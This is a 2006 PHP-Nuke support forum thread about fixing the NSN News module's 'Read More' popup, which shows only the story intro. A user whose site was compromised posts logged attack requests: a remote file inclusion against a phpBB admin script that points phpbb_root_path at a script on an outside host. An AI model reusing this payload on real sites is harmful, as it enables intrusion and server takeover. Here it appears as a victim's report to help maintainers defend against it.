Ravens PHP Scripts: Forums

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NSN News
srhh
Involved
Involved

PostPosted: Thu Oct 12, 2006 1:34 pm Reply with quote

OK, I cut the head off one problem and another few popped up in its place. Speaking of pop ups...the pop-up "Read More" doesn't work..The pop-up doesn't display the full story, only the intro part...
Sad
I decided to use the pop-up function because when it is set to "Read More" in the same page it looks all funky with all the center blocks still displaying. I read about possible fixes for that, but I'm hoping fixing the pop-up will be less complicated.

srhh

PostPosted: Thu Oct 12, 2006 1:36 pm Reply with quote

Actually, now that I'm thinking about it, would having the stories in a popup window affect search engines ability to index the stories?

evaders99
Former Moderator in Good Standing

PostPosted: Thu Oct 12, 2006 2:09 pm Reply with quote

Yes, it is likely that search engines will not see the page if it is generated by Javascript code

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
srhh

PostPosted: Thu Oct 12, 2006 2:26 pm Reply with quote

Thought you were going to say that...
Ok, so the task now is to get rid of the center blocks and the right blocks (so it makes it more readable) when the full story is pulled up....

kguske
Site Admin

PostPosted: Thu Oct 12, 2006 3:04 pm Reply with quote

I think there is an installation step that may have been missed. The popups require a Javascript to be included (overLIB).

srhh

PostPosted: Thu Oct 12, 2006 3:42 pm Reply with quote

Well, the includes file is in includes.
In NEIndex.php, here is the function:
Code:

include("header.php");
if($neconfig['readmore'] == 1) {
  echo "<scr ipt language='JavaScr ipt'>\n";
  echo "<!-- Begin\n";
  echo "function NewsReadWindow(mypage, myname, w, h, scroll) {\n";
  echo "var winl = (screen.width - w) / 2;\n";
  echo "var wint = (screen.height - h) / 2;\n";
  echo "winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+''\n";
  echo "win = window.open(mypage, myname, winprops)\n";
  echo "if(parseInt(navigator.appVersion) >= 4) { win.window.focus(); }\n";
  echo "}\n";
  echo "//  End -->\n";
  echo "</scr ipt>\n";
}

I really like this module...kinda bummed its a PITA.
Although I think I'd be much more interested in getting the center block display issue. See: [ Only registered users can see links on this board! Get registered or login! ]

....either or and I'd be a happy girl...

redhairz
Worker
Worker

PostPosted: Fri Nov 17, 2006 2:19 pm Reply with quote

hi there admin i had installed the RN20202 i think it is working so to speak except the NS side which need time to understand.
However i had a older nuke 7.6 version. with many member. how do i tranfer the DB using myadminphp. i am getting error like #1136 - Column count doesn't match value count at row 1 .. is there a way to add the member manully?
Btw thanks to all raven staff the nuke installation steps was useful and easy thanks for developing the nuke portal for noob user Embarassed
Very disappointly my nuke was hack 4 time, iwas inform from the admin that mysite.. 62.141.52.99 - - [08/Nov/2006:07:02:02
+0800] "GET
/modules/Forums/admin/admin_board.php?phpbb_root_path=http://www.halit.net/khn.txt? HTTP/1.1" 200 1327 "-"
"libwww-perl/5.65"..............it lauch an attack port xx to other internet user. Raven guys might want to take note and add to the NS.

Worse to come my hosting account was suspended.. i lost my members :+_+ Evil or Very Mad

Continue..

Stringa Query: [ Only registered users can see links on this board! Get registered or login! ]
phpbb_root_path=http://www.halit.net/khn.txt?
Stringa GET: [ Only registered users can see links on this board! Get registered or login! ]
phpbb_root_path=http://www.halit.net/khn.txt?
Stringa POST: [ Only registered users can see links on this board! Get registered or login! ]
Inoltrato Per: none
Client IP: none

end
sorry post in the wrong thread

Nukeum66
Life Cycles Becoming CPU Cycles

PostPosted: Fri Nov 17, 2006 4:49 pm Reply with quote

srhh
srhh wrote:
Speaking of pop ups...the pop-up "Read More" doesn't work..The pop-up doesn't display the full story, only the intro part...
Sad

I had the same problem..... Smile
This is how I fixed it.

Open modules/News/public/NERead.php
FIND on or about line 67
Code:
!empty($bodytext)) { $articletext = "$hometext".$notes; } else { $articletext = "$hometext<br><br>$bodytext".$notes; }

And change it to
Code:
!empty($bodytext)) { $articletext = "$hometext<br><br>$bodytext".$notes; } else { $articletext = "$hometext".$notes; }

PostPosted: Sun Nov 19, 2006 8:28 pm Reply with quote

Latest NukeSentinel does protect against that hack on the forums. It will be in the next version of RavenNUke

Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NSN News

View next topic
View previous topic